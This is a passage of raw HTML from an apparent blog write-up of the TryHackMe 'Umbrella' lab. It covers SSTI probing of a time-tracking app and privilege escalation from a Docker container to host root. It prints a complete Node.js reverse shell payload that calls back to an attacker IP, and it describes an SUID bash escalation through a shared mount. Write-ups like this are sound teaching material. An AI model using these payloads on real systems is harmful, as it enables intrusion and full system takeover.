data-orig-size=\"565,365\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?fit=565%2C365&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?resize=565%2C365&#038;ssl=1\" alt=\"\" class=\"wp-image-134\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?w=565&amp;ssl=1 565w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-1.png?resize=300%2C194&amp;ssl=1 300w\" sizes=\"auto, (max-width: 565px) 100vw, 565px\" \/><\/figure>\n\n\n\n<div style=\"height:38px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>There is a login page here. From the pair of credentials we found, we can try logging in. We can log in with<em> <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">barry-b&#8217;s<\/mark><\/em> credentials. 
It looks like a user can update their time by entering a number or a mathematical expression in the input field.<\/p>\n\n\n\n<div style=\"height:42px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"980\" height=\"433\" data-attachment-id=\"136\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/image-3\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?fit=980%2C433&amp;ssl=1\" data-orig-size=\"980,433\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-3\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?fit=980%2C433&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?resize=980%2C433&#038;ssl=1\" alt=\"\" class=\"wp-image-136\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?w=980&amp;ssl=1 980w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?resize=300%2C133&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-3.png?resize=768%2C339&amp;ssl=1 768w\" sizes=\"auto, (max-width: 980px) 100vw, 980px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"685\" height=\"654\" 
data-attachment-id=\"137\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/image-4\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?fit=685%2C654&amp;ssl=1\" data-orig-size=\"685,654\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-4\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?fit=685%2C654&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?resize=685%2C654&#038;ssl=1\" alt=\"\" class=\"wp-image-137\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?w=685&amp;ssl=1 685w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-4.png?resize=300%2C286&amp;ssl=1 300w\" sizes=\"auto, (max-width: 685px) 100vw, 685px\" \/><\/figure>\n\n\n\n<div style=\"height:41px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">SSTI <\/mark><\/h3>\n\n\n\n<p>Every time we try the SSTI payload <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong>{{7*7}}<\/strong><\/mark>, the time for barry-b changes.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"553\" height=\"531\" 
data-attachment-id=\"138\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/ssti-1-1\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?fit=553%2C531&amp;ssl=1\" data-orig-size=\"553,531\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ssti-1-1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?fit=553%2C531&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?resize=553%2C531&#038;ssl=1\" alt=\"\" class=\"wp-image-138\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?w=553&amp;ssl=1 553w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-1.png?resize=300%2C288&amp;ssl=1 300w\" sizes=\"auto, (max-width: 553px) 100vw, 553px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"595\" height=\"572\" data-attachment-id=\"139\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/ssti-1-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?fit=595%2C572&amp;ssl=1\" data-orig-size=\"595,572\" data-comments-opened=\"1\" 
data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ssti-1-2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?fit=595%2C572&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?resize=595%2C572&#038;ssl=1\" alt=\"\" class=\"wp-image-139\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?w=595&amp;ssl=1 595w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-1-2.png?resize=300%2C288&amp;ssl=1 300w\" sizes=\"auto, (max-width: 595px) 100vw, 595px\" \/><\/figure>\n\n\n\n<div style=\"height:34px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>Although it seems like the app is vulnerable to SSTI, I was not able to get an RCE by trying various payloads<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:40px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>We can also see in the log files for the time-tracking app that our input was getting executed. Not sure if it was SSTI or just the mathematical expression 7*7 was getting executed. 
Anyway, we can move on to find another way to escalate our privileges.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"333\" data-attachment-id=\"140\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/ssti-log\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?fit=1343%2C437&amp;ssl=1\" data-orig-size=\"1343,437\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"ssti-log\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?fit=1024%2C333&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?resize=1024%2C333&#038;ssl=1\" alt=\"\" class=\"wp-image-140\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?resize=1024%2C333&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?resize=300%2C98&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?resize=768%2C250&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/ssti-log.png?w=1343&amp;ssl=1 1343w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:44px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 
0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Root (In Docker)<\/mark><\/h3>\n\n\n\n<p>From our NMAP scan, we know that the framework being used for this application is Node.js Express. We will try to get Remote Code Execution by trying out a JavaScript reverse shell. We can simply paste the below payload (change IP to your VPN or AttackBox IP and Port as needed)<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#282A36\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><pre class=\"shiki dracula\" style=\"background-color: #282A36\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #FF79C6\">function<\/span><span style=\"color: #F8F8F2\">(){ <\/span><span style=\"color: #FF79C6\">var<\/span><span style=\"color: #F8F8F2\"> net <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #50FA7B\">require<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">net<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">), cp <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #50FA7B\">require<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">child_process<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">), sh <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> cp.<\/span><span style=\"color: #50FA7B\">spawn<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">\/bin\/bash<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">, []); <\/span><span style=\"color: #FF79C6\">var<\/span><span style=\"color: #F8F8F2\"> client <\/span><span style=\"color: #FF79C6\">=<\/span><span style=\"color: #F8F8F2\"> <\/span><span style=\"color: #FF79C6; 
font-weight: bold\">new<\/span><span style=\"color: #F8F8F2\"> net.<\/span><span style=\"color: #50FA7B\">Socket<\/span><span style=\"color: #F8F8F2\">(); client.<\/span><span style=\"color: #50FA7B\">connect<\/span><span style=\"color: #F8F8F2\">(<\/span><span style=\"color: #BD93F9\">4444<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F1FA8C\">10.13.1.112<\/span><span style=\"color: #E9F284\">&quot;<\/span><span style=\"color: #F8F8F2\">, <\/span><span style=\"color: #FF79C6\">function<\/span><span style=\"color: #F8F8F2\">(){ client.<\/span><span style=\"color: #50FA7B\">pipe<\/span><span style=\"color: #F8F8F2\">(sh.stdin); sh.stdout.<\/span><span style=\"color: #50FA7B\">pipe<\/span><span style=\"color: #F8F8F2\">(client); sh.stderr.<\/span><span style=\"color: #50FA7B\">pipe<\/span><span style=\"color: #F8F8F2\">(client); }); <\/span><span style=\"color: #FF79C6\">return<\/span><span style=\"color: #F1FA8C\"> <\/span><span style=\"color: #FF5555\">\/<\/span><span style=\"color: #F1FA8C\">a<\/span><span style=\"color: #FF5555\">\/<\/span><span style=\"color: #F8F8F2\">;})();<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:42px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Fortunately for us, it worked! 
We are the root user inside the Docker container.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"783\" height=\"149\" data-attachment-id=\"141\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/root\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?fit=783%2C149&amp;ssl=1\" data-orig-size=\"783,149\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"root\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?fit=783%2C149&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?resize=783%2C149&#038;ssl=1\" alt=\"\" class=\"wp-image-141\" style=\"width:1110px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?w=783&amp;ssl=1 783w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?resize=300%2C57&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/root.png?resize=768%2C146&amp;ssl=1 768w\" sizes=\"auto, (max-width: 783px) 100vw, 783px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Root (on the Box)<\/mark><\/h2>\n\n\n\n<p>Going back to the SSH session, we can see that there is a mounted folder under the <mark 
style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong><em>time-tracking <\/em><\/strong><\/mark><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-black-color\">application <\/mark>directory.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1005\" height=\"405\" data-attachment-id=\"142\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/mounted-folder-new\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?fit=1005%2C405&amp;ssl=1\" data-orig-size=\"1005,405\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"mounted-folder-new\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?fit=1005%2C405&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?resize=1005%2C405&#038;ssl=1\" alt=\"\" class=\"wp-image-142\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?w=1005&amp;ssl=1 1005w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?resize=300%2C121&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/mounted-folder-new.png?resize=768%2C309&amp;ssl=1 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" 
\/><\/figure>\n\n\n\n<p>The same directory can be accessed from the container as the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><strong><em>root <\/em><\/strong><\/mark>user. We can use this to our advantage. Theoretically, if we create a file as root in the container&#8217;s \/logs directory, it should appear in the <strong><em>logs <\/em><\/strong>folder under the <strong>time-Tracker-src<\/strong> folder in Claire-r&#8217;s home directory, owned by root. Let&#8217;s test it out!<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"985\" height=\"131\" data-attachment-id=\"143\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/hello-txt1\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?fit=985%2C131&amp;ssl=1\" data-orig-size=\"985,131\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"hello-txt1\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?fit=985%2C131&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?resize=985%2C131&#038;ssl=1\" alt=\"\" class=\"wp-image-143\" style=\"width:1037px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?w=985&amp;ssl=1 985w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?resize=300%2C40&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt1.png?resize=768%2C102&amp;ssl=1 768w\" sizes=\"auto, (max-width: 985px) 100vw, 985px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"171\" data-attachment-id=\"144\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/hello-txt2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?fit=1075%2C180&amp;ssl=1\" data-orig-size=\"1075,180\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"hello-txt2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?fit=1024%2C171&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?resize=1024%2C171&#038;ssl=1\" alt=\"\" class=\"wp-image-144\" style=\"width:1019px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?resize=1024%2C171&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?resize=300%2C50&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?resize=768%2C129&amp;ssl=1 768w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/hello-txt2.png?w=1075&amp;ssl=1 1075w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:35px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Great! This seems to be working. Let&#8217;s continue by copying the <strong><em>\/bin\/bash<\/em><\/strong> binary and setting the SUID bit on it so that Claire-r can run it and become root.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"517\" data-attachment-id=\"145\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/suid\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?fit=1190%2C601&amp;ssl=1\" data-orig-size=\"1190,601\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"suid\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?fit=1024%2C517&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?resize=1024%2C517&#038;ssl=1\" alt=\"\" class=\"wp-image-145\" style=\"width:941px;height:auto\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?resize=1024%2C517&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?resize=300%2C152&amp;ssl=1 300w, 
https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?resize=768%2C388&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid.png?w=1190&amp;ssl=1 1190w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"176\" data-attachment-id=\"146\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/suid-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?fit=1105%2C190&amp;ssl=1\" data-orig-size=\"1105,190\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"suid-2\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/suid-2.png?fit=1024%2C176&amp;ssl=1\" 